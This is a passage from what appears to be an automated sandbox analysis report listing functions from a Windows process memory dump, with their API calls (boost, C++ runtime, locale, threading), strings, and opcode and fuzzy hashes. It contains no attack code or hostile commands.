                                                                                                                                                          • Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExceptionException@8RaiseThrow
                                                                                                                                                        • String ID: )K7~$)K7~$da\
                                                                                                                                                        • API String ID: 3976011213-3451847059
                                                                                                                                                        • Opcode ID: fd563dfb1be060859686bd5f9de9898d8a44698cdd4f34b5056f10795dbaa8ef
                                                                                                                                                        • Instruction ID: e17c0e191beba60b33c25c9db4fd1bac5eb7b3e9c6ea1906b73a2c7e2ba43548
                                                                                                                                                        • Opcode Fuzzy Hash: fd563dfb1be060859686bd5f9de9898d8a44698cdd4f34b5056f10795dbaa8ef
                                                                                                                                                        • Instruction Fuzzy Hash: 7D116371A00609AFCB11EF65C845EEEBBB8FF45714F00422EF815A7651DB386A05CB95
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00414F0D, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • RtlDeleteCriticalSection.NTDLL(?), ref: 00414F76
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,006B1B5E,000000FF,?,00414EC2), ref: 00414F8F
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,006B1B5E,000000FF,?,00414EC2), ref: 00414FAA
                                                                                                                                                          • Part of subcall function 004152B4: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000), ref: 004152DB
                                                                                                                                                          • Part of subcall function 004152B4: GetLastError.KERNEL32 ref: 004152E5
                                                                                                                                                          • Part of subcall function 00414A42: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00414A60
                                                                                                                                                          • Part of subcall function 00414A42: CloseHandle.KERNEL32(?), ref: 00414A69
                                                                                                                                                          • Part of subcall function 00414A42: TerminateThread.KERNEL32(?,00000000), ref: 00414A83
                                                                                                                                                          • Part of subcall function 0041B4D3: CloseHandle.KERNEL32(?,?,00000000,?,00414E9E,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0041B4E3
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseHandle$CompletionCriticalDeleteErrorLastMultipleObjectsPostQueuedSectionStatusTerminateThreadWait
                                                                                                                                                        • String ID: IA
                                                                                                                                                        • API String ID: 1875059124-3293647318
                                                                                                                                                        • Opcode ID: 0318b04e8aa720d527bdc33bca1fa7e1ef94529c4dfe395a1d531f0b97a6a334
                                                                                                                                                        • Instruction ID: bc64d5f9fcb98af22e7e1fdf9e08d116d6cceaadcfa9556ee4f2e636cb451c7b
                                                                                                                                                        • Opcode Fuzzy Hash: 0318b04e8aa720d527bdc33bca1fa7e1ef94529c4dfe395a1d531f0b97a6a334
                                                                                                                                                        • Instruction Fuzzy Hash: 0721CD30804684EBCB21EF69D90579EFBF5EF41714F14466EE04257BA1C7B82A44CB95
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 005C65C0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • CreateDirectoryExW.KERNEL32(00000000,00000000,00000000,?,?,?,00000000,?,?), ref: 005C65F3
                                                                                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,?,006D2049), ref: 005C65FB
                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,006D2049,000000FF), ref: 005C660E
                                                                                                                                                          • Part of subcall function 005CB3A0: __CxxThrowException@8.LIBVCRUNTIME ref: 005CB41D
                                                                                                                                                        Strings
                                                                                                                                                        • boost::filesystem::create_directory, xrefs: 005C6631
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateDirectory$ErrorException@8LastThrow
                                                                                                                                                        • String ID: boost::filesystem::create_directory
                                                                                                                                                        • API String ID: 1759940808-2941204237
                                                                                                                                                        • Opcode ID: 03545c25e4fe3973f69611c5e6df2439d50e445d9a72940958989674e34fcf02
                                                                                                                                                        • Instruction ID: f9a41174d69db771b506a2521d9c89ef8f1281f02ac36995561b7b9a49c3e768
                                                                                                                                                        • Opcode Fuzzy Hash: 03545c25e4fe3973f69611c5e6df2439d50e445d9a72940958989674e34fcf02
                                                                                                                                                        • Instruction Fuzzy Hash: 5701D436A002116BDB007BA56C86F6F775DBF94724F44042EFC0693242EA28DA0A86B6
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0042A28A, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0042A28E
                                                                                                                                                          • Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0042A2F3
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                        • String ID: ^$q
                                                                                                                                                        • API String ID: 3476068407-1334409892
                                                                                                                                                        • Opcode ID: 0d83f10818238b4b8eba4a6834778e4fa47269f40764f57bc73dc9e02ad11405
                                                                                                                                                        • Instruction ID: d2f4c8b767366affaef9942ba31f639a1f63fbe83029946e2e7930c12567b88d
                                                                                                                                                        • Opcode Fuzzy Hash: 0d83f10818238b4b8eba4a6834778e4fa47269f40764f57bc73dc9e02ad11405
                                                                                                                                                        • Instruction Fuzzy Hash: BB01F47180025C6ADB04DBBCD846AEEBBF9EF0C310F10166DE945A6051E7B466948BA8
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0056E6CB, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0056E6D0
                                                                                                                                                          • Part of subcall function 00570EF6: __EH_prolog.LIBCMT ref: 00570EFB
                                                                                                                                                          • Part of subcall function 0056D503: __EH_prolog.LIBCMT ref: 0056D508
                                                                                                                                                        • _strlen.LIBCMT ref: 0056E720
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog$_strlen
                                                                                                                                                        • String ID: IV$nV
                                                                                                                                                        • API String ID: 1490583215-3003290294
                                                                                                                                                        • Opcode ID: c05962e3d8fc297f4ee302d97c7c2f5d4e688ec854dc78c5e9135b85c04c8747
                                                                                                                                                        • Instruction ID: 3628680f0406b5570ccf596cb4b62b01a4657c33aa40d4ee7c5d424085a19e0a
                                                                                                                                                        • Opcode Fuzzy Hash: c05962e3d8fc297f4ee302d97c7c2f5d4e688ec854dc78c5e9135b85c04c8747
                                                                                                                                                        • Instruction Fuzzy Hash: AA0124B1901684EEE725DF2C98456EEFFF8EF85320F10476EE55193292D7F41A408754
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0042646F, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00426474
                                                                                                                                                          • Part of subcall function 00410C2A: __EH_prolog.LIBCMT ref: 00410C2F
                                                                                                                                                          • Part of subcall function 004125BB: __CxxThrowException@8.LIBVCRUNTIME ref: 004125D5
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004264AC
                                                                                                                                                          • Part of subcall function 004AAC0D: __EH_prolog.LIBCMT ref: 004AAC12
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog$Exception@8Throw
                                                                                                                                                        • String ID: \A$boost::thread_resource_error
                                                                                                                                                        • API String ID: 1007369359-2274436434
                                                                                                                                                        • Opcode ID: 5b4e8b6dcd02c03f375c1e6d9bf5f764ccd41d8435a37464d11d85a125eabe76
                                                                                                                                                        • Instruction ID: 895da255b69faa81acbbe5371d9688a182c865f36cab1bdf80bee9e006fe8511
                                                                                                                                                        • Opcode Fuzzy Hash: 5b4e8b6dcd02c03f375c1e6d9bf5f764ccd41d8435a37464d11d85a125eabe76
                                                                                                                                                        • Instruction Fuzzy Hash: 4D016DB1D01229DBDB14EFA8C9167EEBBB4EF00305F10055EE801A7281EBB94B54CBC5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 006A2497, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetUserDefaultLCID.KERNEL32(00000055,?,00000000,006AA52F,?,00000055,00000050), ref: 006A24E1
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DefaultUser
                                                                                                                                                        • String ID: )K7~$0A$GetUserDefaultLocaleName
                                                                                                                                                        • API String ID: 3358694519-2667767434
                                                                                                                                                        • Opcode ID: eef863ff0b940816ab73776e2c2f14e13835a5a1e6cdfdc7850d6424bb2572bd
                                                                                                                                                        • Instruction ID: e4f4f7cb874df3899eac75d3a02dd0b15c7a463f028321095414dea94b8f5b10
                                                                                                                                                        • Opcode Fuzzy Hash: eef863ff0b940816ab73776e2c2f14e13835a5a1e6cdfdc7850d6424bb2572bd
                                                                                                                                                        • Instruction Fuzzy Hash: 74F02B70A81208B7CB117F54DC06EDDBFA7DB06B60F014016FC056A190DAB58E50DBC8
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 006A2560, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • IsValidLocale.KERNEL32(00000000,0069D53E,00000000,00000001,?,?,0069D53E,?,?,0069CF1E,?,00000004), ref: 006A25AC
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LocaleValid
                                                                                                                                                        • String ID: )K7~$0A$IsValidLocaleName
                                                                                                                                                        • API String ID: 1901932003-3411452419
                                                                                                                                                        • Opcode ID: 910ffd648bdaedfce73ef34123ca7251076f24f6b498ce61822aca99875946cd
                                                                                                                                                        • Instruction ID: 399a783178a92c8ab6fdf8b84a82f410db9e6990194d7d146116c0f8b504cfa8
                                                                                                                                                        • Opcode Fuzzy Hash: 910ffd648bdaedfce73ef34123ca7251076f24f6b498ce61822aca99875946cd
                                                                                                                                                        • Instruction Fuzzy Hash: B6F0E9B0AC221877C7107B689C16FED7B96DB56750F410019FD096A2D0D9B54E418A8C
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 006A23D1, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 30timeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000,0069353B), ref: 006A2410
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Time$FileSystem
                                                                                                                                                        • String ID: )K7~$0A$GetSystemTimePreciseAsFileTime
                                                                                                                                                        • API String ID: 2086374402-4072681347
                                                                                                                                                        • Opcode ID: 9230b18373f55ee260b0e5eab6ff6f444240f1ac92cfc7ebf1272f0ca0b57839
                                                                                                                                                        • Instruction ID: a1ad7a5e52a5685f7f2371d0f95ff5afeef431dcd43e85c2a77f6bbee0945a5d
                                                                                                                                                        • Opcode Fuzzy Hash: 9230b18373f55ee260b0e5eab6ff6f444240f1ac92cfc7ebf1272f0ca0b57839
                                                                                                                                                        • Instruction Fuzzy Hash: 9FE05570A82208BB8710BB18CC06CBE7FABDB06B20B41012AFC014B280DD604E508AE5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00410D94, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00410D99
                                                                                                                                                        • CreateEventA.KERNEL32(00000000,?,?,00000000), ref: 00410DAB
                                                                                                                                                          • Part of subcall function 00410C2A: __EH_prolog.LIBCMT ref: 00410C2F
                                                                                                                                                          • Part of subcall function 004125BB: __CxxThrowException@8.LIBVCRUNTIME ref: 004125D5
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog$CreateEventException@8Throw
                                                                                                                                                        • String ID: \A$boost::thread_resource_error
                                                                                                                                                        • API String ID: 198059956-2274436434
                                                                                                                                                        • Opcode ID: 75ba037e1a2fee592f0ffb212b10fbf52aff3762c5be22bcafcb1f5eab1aff46
                                                                                                                                                        • Instruction ID: 3a6d61d6cbfb7a1cd7bdc6004fbd6872e71c65389f45b73d5c14f5fc945e441d
                                                                                                                                                        • Opcode Fuzzy Hash: 75ba037e1a2fee592f0ffb212b10fbf52aff3762c5be22bcafcb1f5eab1aff46
                                                                                                                                                        • Instruction Fuzzy Hash: 7CF0A071940208EBDF10EF94DD15BDD7B31EB00704F004159F905AA680D7B54A848B85
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00412535, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0041253A
                                                                                                                                                          • Part of subcall function 00412730: __EH_prolog.LIBCMT ref: 00412735
                                                                                                                                                          • Part of subcall function 004104B3: __EH_prolog.LIBCMT ref: 004104B8
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00412588
                                                                                                                                                          • Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog$ExceptionException@8RaiseThrow
                                                                                                                                                        • String ID: h9A$u*A
                                                                                                                                                        • API String ID: 1193697898-1879692700
                                                                                                                                                        • Opcode ID: ec4cfd4c4d17e826686f21b6679fe394d0da0802c20cbf9dfbf5b4353eb7ec35
                                                                                                                                                        • Instruction ID: 5aef6b70cab11d1d3b7f651b313a36864c524077e779482f411509be261b37f1
                                                                                                                                                        • Opcode Fuzzy Hash: ec4cfd4c4d17e826686f21b6679fe394d0da0802c20cbf9dfbf5b4353eb7ec35
                                                                                                                                                        • Instruction Fuzzy Hash: 20F01CB08012C8AACB04EBE1C65A6CDBFB1AF14345F60416CD0117A195C7F90B4DCB59
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004167E3, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004167E8
                                                                                                                                                        • std::exception::exception.LIBCONCRT ref: 00416805
                                                                                                                                                          • Part of subcall function 0040F331: ___std_exception_copy.LIBVCRUNTIME ref: 0040F358
                                                                                                                                                          • Part of subcall function 0041CEE0: __EH_prolog.LIBCMT ref: 0041CEE5
                                                                                                                                                          • Part of subcall function 0041CEE0: __CxxThrowException@8.LIBVCRUNTIME ref: 0041CF33
                                                                                                                                                        Strings
                                                                                                                                                        • Ltm, xrefs: 0041681C
                                                                                                                                                        • could not convert calendar time to UTC time, xrefs: 004167FD
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog$Exception@8Throw___std_exception_copystd::exception::exception
                                                                                                                                                        • String ID: Ltm$could not convert calendar time to UTC time
                                                                                                                                                        • API String ID: 4220666059-658327178
                                                                                                                                                        • Opcode ID: 605d8d01fec743700305596844c76c722fdf7dc2fa8a7c5cfdb5b2147f57597f
                                                                                                                                                        • Instruction ID: dcf43351c399c8163aa825fff023e3ee703282c807e2fbf5db019ee19938c0da
                                                                                                                                                        • Opcode Fuzzy Hash: 605d8d01fec743700305596844c76c722fdf7dc2fa8a7c5cfdb5b2147f57597f
                                                                                                                                                        • Instruction Fuzzy Hash: AEE09A70D00249AACB04FFA0D9227EEBF71EB00318F00017EE800A6681EB795A88DBC5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004265B8, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004265BD
                                                                                                                                                        • std::exception::exception.LIBCONCRT ref: 004265CE
                                                                                                                                                          • Part of subcall function 0040F331: ___std_exception_copy.LIBVCRUNTIME ref: 0040F358
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog___std_exception_copystd::exception::exception
                                                                                                                                                        • String ID: call to empty boost::function$>A
                                                                                                                                                        • API String ID: 238416039-2994083794
                                                                                                                                                        • Opcode ID: 492e1df3a0f4214d0b2323c24fd4c8d8686f51a7345613202c2030e716205531
                                                                                                                                                        • Instruction ID: 1c48ea23e6bb69889d1b3afc54994ae3e49856f857573f9c22d91e325ea18a39
                                                                                                                                                        • Opcode Fuzzy Hash: 492e1df3a0f4214d0b2323c24fd4c8d8686f51a7345613202c2030e716205531
                                                                                                                                                        • Instruction Fuzzy Hash: 26E09AB1D00618EBEB20EF48C90639DBFB8EB04324F1002AEE41067782D7F81F408B81
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004A8E29, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • new.LIBCMT ref: 004A8E35
                                                                                                                                                        • std::locale::_Init.LIBCPMT ref: 004A8E3E
                                                                                                                                                          • Part of subcall function 0057BBA4: __EH_prolog3.LIBCMT ref: 0057BBAB
                                                                                                                                                          • Part of subcall function 0057BBA4: std::_Lockit::_Lockit.LIBCPMT ref: 0057BBB6
                                                                                                                                                          • Part of subcall function 0057BBA4: std::locale::_Locimp::_New_Locimp.LIBCPMT ref: 0057BBC9
                                                                                                                                                          • Part of subcall function 0057BBA4: std::locale::_Setgloballocale.LIBCPMT ref: 0057BBD1
                                                                                                                                                          • Part of subcall function 0057BBA4: _Yarn.LIBCPMT ref: 0057BBE7
                                                                                                                                                          • Part of subcall function 0057BBA4: std::_Lockit::~_Lockit.LIBCPMT ref: 0057BC25
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::locale::_$Lockitstd::_$H_prolog3InitLocimpLocimp::_Lockit::_Lockit::~_New_SetgloballocaleYarn
                                                                                                                                                        • String ID: 08J$|m
                                                                                                                                                        • API String ID: 2548088810-1892464957
                                                                                                                                                        • Opcode ID: 05ad9c44b4fa1269ab19f17aa78e09bd5db8aa7ce0f661cd5fa0b926787b62a0
                                                                                                                                                        • Instruction ID: 84d4d794cb36093314a0ecf770378b6f4a9c69e4101786ffe60e292f9d90b6d8
                                                                                                                                                        • Opcode Fuzzy Hash: 05ad9c44b4fa1269ab19f17aa78e09bd5db8aa7ce0f661cd5fa0b926787b62a0
                                                                                                                                                        • Instruction Fuzzy Hash: 56D05E72B057115EE3946B2AB906A49AAD6EFD1720F14402FF108DB281EFF158058758
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0068BD18, Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 6a15b45b0f763e1c9e0244f52812c25da5cfa2678390685caaefadf5a9c4950b
                                                                                                                                                        • Instruction ID: 6b2c675e6c4dc60017a3341f5f4b1402dd779f2f9c944f98ce804adc70080440
                                                                                                                                                        • Opcode Fuzzy Hash: 6a15b45b0f763e1c9e0244f52812c25da5cfa2678390685caaefadf5a9c4950b
                                                                                                                                                        • Instruction Fuzzy Hash: 7341C472600604BFD724BF78CC41BAABBEAEF85710F10572EF511DB691D771A9428B84
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0042542B, Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00425430
                                                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 00425444
                                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 00425472
                                                                                                                                                        • CloseHandle.KERNEL32(00000004), ref: 00425497
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$CloseEnterH_prologHandleLeave
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2171098948-0
                                                                                                                                                        • Opcode ID: 93d3f9291c0a5d70df9dfd401076807cd14d36c3e60e4cc29ba1194ae8c529f4
                                                                                                                                                        • Instruction ID: 60bbdf61d8af7353e964979f1b10fe484abc8bd98e495041b2ab3131eb4d8b2a
                                                                                                                                                        • Opcode Fuzzy Hash: 93d3f9291c0a5d70df9dfd401076807cd14d36c3e60e4cc29ba1194ae8c529f4
                                                                                                                                                        • Instruction Fuzzy Hash: CC419A71E01A259FCB28EF98D5407AEFBB1BF04311F51415ED509A7341C734AA84CBE5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00415176, Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0041517B
                                                                                                                                                        • TlsGetValue.KERNEL32 ref: 004151F5
                                                                                                                                                        • TlsSetValue.KERNEL32(?), ref: 00415208
                                                                                                                                                        • TlsSetValue.KERNEL32(?,?,?,?,?,?,?), ref: 00415241
                                                                                                                                                          • Part of subcall function 004152B4: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000), ref: 004152DB
                                                                                                                                                          • Part of subcall function 004152B4: GetLastError.KERNEL32 ref: 004152E5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Value$CompletionErrorH_prologLastPostQueuedStatus
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 158160221-0
                                                                                                                                                        • Opcode ID: bd4b4b26a3524fd9cec7b945f2c3bcce7ac64fd8819b3e1191436a365f1de495
